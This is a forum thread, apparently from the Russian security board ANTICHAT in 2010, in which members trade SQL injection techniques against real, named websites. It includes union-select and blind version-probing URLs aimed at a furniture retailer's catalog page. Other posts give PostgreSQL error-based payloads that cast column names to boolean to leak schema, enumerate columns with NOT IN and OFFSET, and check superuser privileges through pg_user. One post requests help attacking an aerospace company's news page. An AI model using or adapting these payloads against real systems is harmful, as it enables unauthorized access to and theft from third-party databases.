ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.02.2010, 21:37
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от Seravin
Код:
http://www.pinskdrev.by/catalog.php?sub_id=6+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
Объяснит мне кто-нибудь, что делать когда есть два запроса в скрипте? Blind
Код:
http://www.pinskdrev.by/catalog.php?sub_id=6+and+substring(version(),1,1)=5
PS: Забыл о выводе через name_const 
Последний раз редактировалось mailbrush; 14.02.2010 в 21:40..
|
|
|
14.02.2010, 22:56
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
2 auth_root
там, походу, инъекция после лимита, да еще и с ордер баем, а при таком сочетании, насколько мне известно, инъекцию провести невозможно  |
|
|
|
15.02.2010, 06:40
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283
Репутация:
69
|
|
PostgreSQL 8.3.7
-------------------------------------
Подскажите с конструкцией типа:
select+column_name::text::boolean+from+information _schema.columns--
в ответ
неверный входной синтаксис для типа boolean: "typname"
select+column_name::text::boolean+from+information _schema.columns+where+column_name+not+in($$typname $$)----
неверный входной синтаксис для типа boolean: "typnamespace"
Я так понимаю typename и typenamespace - это названия колонок. Но как дальше перебирать конструкцией not in?
При проверке же
select+usesuper+from+pg_user+where+usename=($$curr ent_user$$)----
в ответ страница без ошибок и нужной мне информации
если
select+usesuper+from+pg_user+where+usename=current _user----
то
Bad column offset specified
ошибка синтаксиса в конце ввода LINE 1: SELECT * FROM sdesc WHERE idservice= ^ in
select+column_name::text::boolean+from+information _schema.columns+limit+1+offset+0--
неверный входной синтаксис для типа boolean: "tmplname"
в этой же конструкции ни лимит ни оффсет ничего не меняет.
Последний раз редактировалось samarin; 15.02.2010 в 06:43..
|
|
|
|
15.02.2010, 09:57
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
Но как дальше перебирать конструкцией not in?
Так и перебирать
Код:
not+in($$typname$$,$$typnamespace$$,$$other_column$$)
и т.д. А чем LIMIT ... OFFSET ... не нравится для перебора таблиц?
|
|
|
|
15.02.2010, 14:43
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283
Репутация:
69
|
|
Спасибо, уже хоть что-то заработало
и т.д. А чем LIMIT ... OFFSET ... не нравится для перебора таблиц?
select+column_name::text::boolean+from+information _schema.columns+limit+1+offset+0--
Цитата:
неверный входной синтаксис для типа boolean: "tmplname"
Изменение же LIMIT ... OFFSET на вывод не влияет, как выдал он tmplname, так его и выдает
|
|
|
|
15.02.2010, 14:58
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
лимит менять не стоит, изменяется оффсет. Если по какой-то причине не удается получить инфу из pg_user, то попробуйте выяснить о статусе поля usesuper косвенно, например, обратившись к pg_shadow / pg_authid. Также не исключено отсутствие прав на pg_user, следовательно, usesuper = false
Added. Проверил сейчас в консоли. Запросы
Код:
select column_name::text::boolean from information_schema.columns order by 1 limit 1 offset 2;
select column_name::text::boolean from information_schema.columns order by 1 limit 1 offset 3;
select column_name::text::boolean from information_schema.columns order by 1 limit 1 offset 1000;
выдает один и тот же результат
Последний раз редактировалось krypt3r; 15.02.2010 в 15:12..
|
|
|
|
15.02.2010, 15:08
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283
Репутация:
69
|
|
это-то понятно,
select+column_name::text::boolean+from+information _schema.columns+limit+1+offset+22----
неверный входной синтаксис для типа boolean: "tmplname"
ничего в выводе не меняется
к pg_shadow нет доступа |
|
|
|
15.02.2010, 15:17
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
так, попробуйте по-другому запрос составить
Код:
select column_name::text::boolean from (select column_name from information_schema.columns limit 1 offset 2)q;
|
|
|
|
15.02.2010, 20:13
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Помогите разобраться(если кому не лень с объяснениями) :
http://www.sukhoi.org/news/company/?id=3142
Заранее спс! |
|
|
|
15.02.2010, 20:25
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Сообщение от CyberHunter
Помогите разобраться(если кому не лень с объяснениями) :
Заранее спс!
Направляете мышкой на ссылку, зажимаете левую кнопку и тянете пока не выделиться вся ссылка. Потом, нажимаете пальцами на клавиатуре сочитание клавиш, сначала "ctrl", потом не отпуская "ctrl" (понимаю это трудно, но что делать) нажимаете кнопочку "c" и в адресной строке браузера нажимаете "ctrl"+"v", далее жмякаете enter и вуаля вы внутри сайта. Если что непонятно, пишите в пм, объясню подробно.
зы. Надеюсь помог.
|
|
|
|
|
|
|
|
Здесь присутствуют: 8 (пользователей: 0 , гостей: 8)
|
|
|
|
Похожие темы
Линейный вид
